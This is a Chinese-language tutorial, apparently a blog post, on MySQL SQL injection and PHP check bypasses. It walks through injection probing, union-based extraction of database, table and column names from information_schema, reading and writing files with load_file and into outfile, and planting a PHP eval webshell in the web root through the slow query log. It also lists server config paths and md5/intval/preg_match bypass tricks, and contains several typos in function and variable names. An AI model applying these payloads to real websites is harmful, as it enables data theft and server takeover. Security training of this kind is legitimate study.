SQL注入 (一)

一、sql注入的简介

将一段内容传入到目标网站,这段内容会被当做程序来执行

二、MySQL扩展补充

mysql的结构

  • 表名
  • 字段
  • 数据

mysql的用户

  • 管理员:跨库、文件读写操作
  • 普通用户:猜解

判断目标网站的用户类别

  • 白盒:读代码
  • 黑盒:user()

使用mysql 5.0以上版本

mysql5.0以及5.0以上的版本都存在一个系统自带的系统数据库,叫做:information_schema 5.0以上为多用户。information_schema下面又包含了这几张表:schemata、tables、columns。

表1:schemata:记录了系统中所有的库名,包含一个关键字段

  • schema_name:保存的库名
sql 复制代码
select schema_name from information_schema.schemata

**表1:**tables:记录了系统中所有的表名,包含两个关键字段

  • table_schema:保存的库名
  • table_name:保存的表名
sql 复制代码
select table_name from information_schema.tables where table_schema=xxxx

**表二:**columns:记录当前系统中的字段名,包含三个关键字段

  • table_schema:保存的库名

  • table_name:保存的表名

  • column_name:字段名

    select column_name from information_schema.columns where table_schema=xxx and table_name=xxx

SQL注入的常用函数

  • user() 当前所使用的用户名
  • datebase() 当前所使用的库名
  • version 当前MySQL的版本

三、SQL注入的流程

3.1 简介

常用的注入方法:

  • 手工注入
  • sqlmap
  • python+sqlmap

3.2 sql注入的流程

1. 判断是否存在漏洞

思路:向网站传入一个代码,检查是否为被执行,能执行就说明存在漏洞

and 1=1

and 1=2

or 1=2

or 1=1

4-3

2. 判断目标网站的数据库中的表中有几个字段

order by 数字

3. 找到网页中回显位

链接查询:在一个sql语句中,从两个表查数据

联合查询:依次先后执行两个sql语句 - union

4. 找到数据库的库名

database()

5. 找到数据库的表名

id=1 union select 11,table_name form information_schema.tables where table_schema='db001' limit 5,1

6. 找到字段名

id=1 union select 11,column_name form information_schema.columns where table_name='users' limit 3,1

7. 找数据

id=1 union select user form users limit 2,1

四、管理员身份注入

文件读写

跨库

文件读写

sql 复制代码
load_file("目标文件")                    //可以读取文件内容"
select "内容" into outfile "目标文件"    //可以向网站目录下的文件里写内容

读取文件结果可能是NULL的可能原因

当前用户的权限问题,需要具有file权限

文件路径错误

sql 复制代码
Windows: 注意C:\\a.txt
linux: /etc/d.txt

文件大小超过上限

sql 复制代码
max_allowed_packet

查看环境变量

sql 复制代码
show global variables     // 全局
show session variables    // 会话

设置环境变量

sql 复制代码
set global 变量名=值
set session 变量名=值

文件读写权限控制

sql 复制代码
secure_file_priv=null    不允许进行读写操作
secure_file_priv=路径    只允许在特定的目录下进行读写操作
secure_file_priv=' '     允许随意进行读写操作

真实环境中secure_file_priv 往往都是处于开启状态的,绕过的基本思路就是结合慢查询日志

启动慢查询日志

sql 复制代码
set global show_query_log=on;

设置查询日志的保存路径【需要将其设置为网站根目录】

sql 复制代码
set global slow_query_log_file='d:\\web1\a.php';

触发慢查询

sql 复制代码
select "<?php eval($_GET['p']);?>"  or sleep(10);

此时就可以去访问a.php了

获取网站根目录的途径

  1. 触发网站报错提醒

  2. 利用phpinfo(),参数是document_root

3.利用load_file(),读取网站的配置文件中的document_root

sql 复制代码
linux配置文件的路径相对固定:
    apache 的配置文件: /etc/httpd/conf/httpd.conf
    nginx  的配置文件: /etc/nginx/nginx.conf

也可能在其他位置
    apache 的配置文件: /usr/local/httpd/conf/httpd.conf
    nginx  的配置文件: /usr/local/nginx/conf/nginx.conf

使用apache部署的网站根目录: /var/www/html
使用nginx部署大的网站根目录: /usr/share/html

mysql的配置文件: /etc/my.cnf

nginx 定义网站根目录的关键字:root
apache 定义网站根目录的关键字:DocumentRoot

五、php的相关函数

5.1 php的等号

= == ===

5.2 md5绕过

可以传入两个md5加密后是0e开头的字符串,需要注意的是,这个以0e开头的字符串只能是纯数字,这样PHP在进行科学算法的时候才会将它转化为0;可以查找以0e开头的md5加密相等的字符串,也可以自己编写代码,提供以下脚本。

常见的字符串有:byGcY、QNKCDZO、240610708、314282422

php 复制代码
<?php
    for ($a=1;$a<=100000000;$a++){
        $md5=md5($a)
        if(preg_match('/^0e\d+$/',$md5)){
            // \d+ 表示一个或多个数字字符
            echo $a;
            echo "\n";
            echo $md5;
            echo "\n";
        }
    }
?>

5.3 intval

作用:进行数据类型转换成整数

返回结果:

  • 0:转换失败或者转换的对象是一个空数组
  • 1:对象是一个非空数组
  • 整数:成功

转换的目的:绕过输入限制,例如系统禁止输入6,那么就可以将6转换成二进制,八进制,十六进制

绕过的基本思路

当某个数字被过滤的时候,就可以将其转换为其他的进制格式的数字,例如过滤了10,可以将其转换为八进制

如果是弱比较,例如(3==b),系统禁止输入3

可以写入3.1【小数】

可以写3abc【字符串转数字绕过】

可以写1+2 【运算绕过】

可以写~~3 【连续两次取反】

数组绕过

直接向网站传入数组元素,同时结合intval进行转换

案例:

php 复制代码
var_dump(intval(012));
echo"<br>";
var_dump(intval(0xB));
echo"<br>";

var_dump(intval(array()));
echo"<br>";
var_dump(intval(array('1111',22222)));
echo"<br>";

var_dump(intval(1.2));
echo"<br>";
var_dump(intval("1.2"));
echo"<br>";

var_dump(intval("abc123"));
echo"<br>";

var_dump(intval("123abc"));
echo"<br>";

var_dump(intval("012"));
echo"<br>";

var_dump(intval(3+4));
var_dump(intval(3*4));
var_dump(intval(03+4));
var_dump(intval(03*4));
echo"<br>";

各种进制的开头

php 复制代码
十进制:
二进制:0b  0B
八进制:0   0O  0o
十六进制:0x   0X

二进制binary

八进制octal

十进制decimal

十六进制hexadecimal

5.4 strpos

在指定的字符串中,定位特定的字符程序的位置

位置从0开始

返回结果:

  • 目标字符的索引值
  • Flash

5.5 is_array()

作用:在数组中搜索指定的值

安全隐患/绕过思路

检查是否有第三个参数,true

5.6 perg_match

返回值

0、1 匹配次数

false发生错误

绕过思路

%0a、大小写、数组

3.7 str_replace

返回结果是替换了目标内容后的结果字符串

绕过思路

大小写绕过

写绕过

相关推荐
武子康1 小时前
大数据-230 离线数仓 - ODS层的构建 Hive处理 UDF 与 SerDe 处理 与 当前总结
java·大数据·数据仓库·hive·hadoop·sql·hdfs
武子康10 小时前
Java-06 深入浅出 MyBatis - 一对一模型 SqlMapConfig 与 Mapper 详细讲解测试
java·开发语言·数据仓库·sql·mybatis·springboot·springcloud
爱上口袋的天空10 小时前
09 - Clickhouse的SQL操作
数据库·sql·clickhouse
黑客Ash10 小时前
【D01】网络安全概论
网络·安全·web安全·php
.Ayang12 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang12 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
Yang.9912 小时前
基于Windows系统用C++做一个点名工具
c++·windows·sql·visual studio code·sqlite3
网络安全-老纪13 小时前
iOS应用网络安全之HTTPS
web安全·ios·https
Mr.Pascal14 小时前
刚学php序列化/反序列化遇到的坑(攻防世界:Web_php_unserialize)
开发语言·安全·web安全·php